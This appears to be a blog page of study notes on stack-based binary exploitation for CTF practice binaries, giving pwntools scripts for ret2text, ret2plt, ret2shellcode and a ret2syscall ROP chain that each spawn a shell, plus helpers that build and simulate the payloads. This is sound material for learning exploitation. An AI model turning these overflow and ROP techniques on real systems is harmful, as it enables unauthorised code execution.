PWN Study Notes

生活记录馆 2022-07-12 49 views


Principles

Dangerous functions: gets, scanf (both copy input into a buffer with no length bound, so they overflow a stack buffer)
pwndbg

Installation

Python 2:

pip install pwntools

Python 3 (pwntools dev3 branch):

apt-get update
apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade git+https://github.com/Gallopsled/pwntools.git@dev3

ni: step over one instruction (does not enter calls)
si: step into the called function



libc_database

Example

Getting a shell with pwntools

from pwn import *
sh = process('./level0')

# address of the function that calls system("/bin/sh")
callsystem = 0x400596

# p64 packs little-endian: 96 05 40 00 00 00 00 00
# fill the 0x80-byte buffer with 'a', overwrite the saved rbp (8 bytes), then overwrite the return address with callsystem
payload = b'a'*0x80 + b'b'*8 + p64(callsystem)

# attach gdb here to set a breakpoint
# gdb.attach(sh)

sh.send(payload)

# interact with the shell
sh.interactive()

# gdb: examine 5 bytes of memory as hex
# x/5bx 0x400596
# gdb: continue execution
# c


# check the binary's protections
checksec level0

# check whether ASLR is enabled (0 = off, 1 = stack/mmap/vdso randomized, 2 = also the heap)
cat /proc/sys/kernel/randomize_va_space

Protections

Viewing protection attributes (the checksec output for the binary)

PIE

Position-independent executable: the binary is mapped at a random base, so hard-coded addresses such as callsystem = 0x400596 only work when PIE is off (or after leaking the base).

NX

Non-executable stack: with NX on, shellcode placed on the stack cannot run, so ret2shellcode needs NX off; otherwise return into existing code (ret2text, ROP).

RELRO

Partial RELRO

The GOT stays writable at run time.

Full RELRO

All imports are resolved at load time and the GOT is mapped read-only, so GOT entries cannot be overwritten.
ret2text


from pwn import *
sh = process('./ret2text')
# address of the backdoor code in .text that spawns a shell
backdoor = 0x0804846D
# fill the 0x28-byte buffer, overwrite the saved ebp (4 bytes), then the return address
payload = b'a'*0x28 + b'b'*4 + p32(backdoor)
sh.send(payload)
sh.interactive()

level2

Uses the PLT table (return into system@plt)

from pwn import *

sh = process('./level2')

system_plt = 0x8048320   # system's PLT entry
bin_sh = 0x804a024       # address of the "/bin/sh" string

# fill the buffer: the 0x88 bytes below the saved ebp + 4 bytes for the saved ebp itself
payload = b'a'*0x88 + b'b'*4

# return address = system@plt, then the return address system will use (never needed, so 0), then system's argument
payload += p32(system_plt) + p32(0) + p32(bin_sh)

#gdb.attach(sh)

sh.send(payload)

sh.interactive()

ret2shellcode


level1


from pwn import *

sh = process('./level1')

# the program leaks the buffer address: "What's this:0x...?"
sh.recvuntil(b'What\'s this:0x')
buf_addr = sh.recvuntil(b'?', drop=True)
buf_addr = int(buf_addr, 16)

shellcode = asm(shellcraft.sh())

# shellcode first, padded with 'a' up to 0x88 bytes, then 4 bytes for the saved ebp, then the return address = the leaked buffer address (needs NX off)
payload = shellcode.ljust(0x88, b'a') + b'b'*4 + p32(buf_addr)

sh.send(payload)
sh.interactive()
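The level0, ret2text, level2 and level1 scripts above all build the same stack layout by hand: padding up to the saved frame pointer, a fake saved ebp/rbp, then the words that land on the return address and the slots above it. The block below is an added example, not the page's code and not pwntools: it reimplements p32/p64 with struct, builds the three payload shapes, and decodes a payload back into its slots so the layout can be checked before sending. The helper names (overflow_payload, ret2plt_32, ret2shellcode_32, decode_frame) and the sample shellcode are my own.

```python
import struct


def p32(value):
    """Pack a 32-bit value little-endian, like pwntools' p32()."""
    return struct.pack("<I", value)


def p64(value):
    """Pack a 64-bit value little-endian, like pwntools' p64()."""
    return struct.pack("<Q", value)


def overflow_payload(buf_len, word_size, words):
    """Padding up to the saved frame pointer, a fake saved ebp/rbp (word_size bytes),
    then the words that overwrite the return address and the slots above it."""
    pack = p32 if word_size == 4 else p64
    payload = b"a" * buf_len + b"b" * word_size
    for w in words:
        payload += pack(w)
    return payload


def ret2plt_32(buf_len, func_plt, args, fake_ret=0):
    """x86 cdecl: the PLT entry lands on the return address, the next slot is the
    return address *that function* will use, then its arguments in order."""
    return overflow_payload(buf_len, 4, [func_plt, fake_ret] + list(args))


def ret2shellcode_32(buf_len, shellcode, buf_addr):
    """Shellcode at the start of the buffer, padded to the saved ebp, then the
    leaked buffer address as the return address (only works with NX off)."""
    if len(shellcode) > buf_len:
        raise ValueError("shellcode does not fit in the buffer")
    return shellcode.ljust(buf_len, b"a") + b"b" * 4 + p32(buf_addr)


def decode_frame(payload, buf_len, word_size):
    """Split a payload back into (padding, saved_fp, words) so the layout can be
    checked before it is sent: everything past the saved fp must be whole words."""
    fmt = "<I" if word_size == 4 else "<Q"
    padding = payload[:buf_len]
    saved_fp = payload[buf_len:buf_len + word_size]
    rest = payload[buf_len + word_size:]
    if len(rest) % word_size:
        raise ValueError("bytes after the saved frame pointer are not word aligned")
    words = [struct.unpack(fmt, rest[i:i + word_size])[0]
             for i in range(0, len(rest), word_size)]
    return padding, saved_fp, words


if __name__ == "__main__":
    # level0 (x86-64): 0x80-byte buffer, 8-byte saved rbp, return into callsystem
    print(p64(0x400596).hex())                      # 9605400000000000
    # level2 (x86): system@plt, dummy return address, pointer to "/bin/sh"
    frame = ret2plt_32(0x88, 0x8048320, [0x804a024])
    print([hex(w) for w in decode_frame(frame, 0x88, 4)[2]])
```

decode_frame is the check worth running on every payload: an off-by-four in the padding shows up as a misaligned word list or a wrong first return address, which is cheaper to catch here than under gdb.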

ret2syscall

ROP

Chain three gadgets, i.e. control the return address three times:

from pwn import *

elf = ELF('./ret2syscall')
sh = process('./ret2syscall')

# gadget addresses in the static binary
pop_eax_ret = 0x080b8316   # pop eax; ret
pop3_ret = 0x0806edd0      # pops three registers then ret; the last value popped goes into ebx
int_0x80 = 0x0806ca25      # int 0x80
bin_sh = next(elf.search(b'/bin/sh\x00'))   # "/bin/sh" string inside the binary

# execve("/bin/sh", 0, 0): eax = 0xb (execve), ebx = "/bin/sh", ecx = 0, edx = 0
payload = b'a'*0x28 + b'b'*4
payload += p32(pop_eax_ret) + p32(0xb)
payload += p32(pop3_ret) + p32(0) + p32(0) + p32(bin_sh)
payload += p32(int_0x80)

sh.send(payload)
sh.interactive()
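To see why the chain above works, it helps to walk it the way the CPU does after the vulnerable function's ret: each pop consumes the next dword on the stack, each ret loads the next dword into eip, and int 0x80 fires with whatever is in the registers. The block below is an added example, not the page's code: it rebuilds the page's payload with struct, simulates the gadgets, and reports the register state at the syscall. The gadget semantics are assumed from how the payload feeds them (one value for pop_eax_ret, three for pop3_ret, with ebx popped last so it receives bin_sh); the bin_sh address used in the usage code is a placeholder, not the real one.

```python
import struct


def p32(value):
    return struct.pack("<I", value)


def u32(data):
    return struct.unpack("<I", data)[0]


SYS_EXECVE = 0xB  # i386 syscall number for execve

# Instruction lists per gadget address (addresses from the script above; the
# sequences are assumed from the payload layout, not read from the binary).
GADGETS = {
    0x080B8316: ["pop eax", "ret"],
    0x0806EDD0: ["pop edx", "pop ecx", "pop ebx", "ret"],
    0x0806CA25: ["int 0x80"],
}


def build_chain(buf_len, bin_sh):
    """Same layout as the page's payload: padding, fake ebp, then the chain."""
    chain = b"a" * buf_len + b"b" * 4
    chain += p32(0x080B8316) + p32(SYS_EXECVE)
    chain += p32(0x0806EDD0) + p32(0) + p32(0) + p32(bin_sh)
    chain += p32(0x0806CA25)
    return chain


def simulate(payload, buf_len, gadgets=GADGETS, max_steps=64):
    """Execute the chain: pops read the next dword, ret jumps to the next dword.
    Returns the register dict at int 0x80, raises if the chain runs off the rails."""
    regs = {}
    sp = buf_len + 4                  # the overwritten return address sits here
    pc = u32(payload[sp:sp + 4])
    sp += 4
    for _ in range(max_steps):
        if pc not in gadgets:
            raise ValueError("return into unknown address 0x%08x" % pc)
        for insn in gadgets[pc]:
            if insn.startswith("pop "):
                regs[insn[4:]] = u32(payload[sp:sp + 4])
                sp += 4
            elif insn == "ret":
                pc = u32(payload[sp:sp + 4])
                sp += 4
            elif insn == "int 0x80":
                return regs
            else:
                raise ValueError("unsupported instruction " + insn)
    raise ValueError("chain did not reach int 0x80")


def syscall_view(regs):
    """Decode the register state at int 0x80 as execve(ebx, ecx, edx), or None."""
    if regs.get("eax") != SYS_EXECVE:
        return None
    return ("execve", regs.get("ebx"), regs.get("ecx"), regs.get("edx"))


def chain_reaches_syscall(payload, buf_len):
    """True only if the chain lands on int 0x80 with eax set to execve."""
    try:
        return syscall_view(simulate(payload, buf_len)) is not None
    except (ValueError, struct.error):
        return False


if __name__ == "__main__":
    BIN_SH = 0x080BE408   # placeholder for the address elf.search() returns
    payload = build_chain(0x28, BIN_SH)
    print(syscall_view(simulate(payload, 0x28)))
    # with the padding four bytes short, the first ret lands on "bbbb" instead of a gadget
    print(chain_reaches_syscall(payload, 0x24))
```

The second call shows the usual failure mode: if the distance to the return address is wrong, eip is loaded with the filler bytes rather than the first gadget, which the simulator reports instead of a silent crash.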

Heap memory


References

https://wiki.x10sec.org/

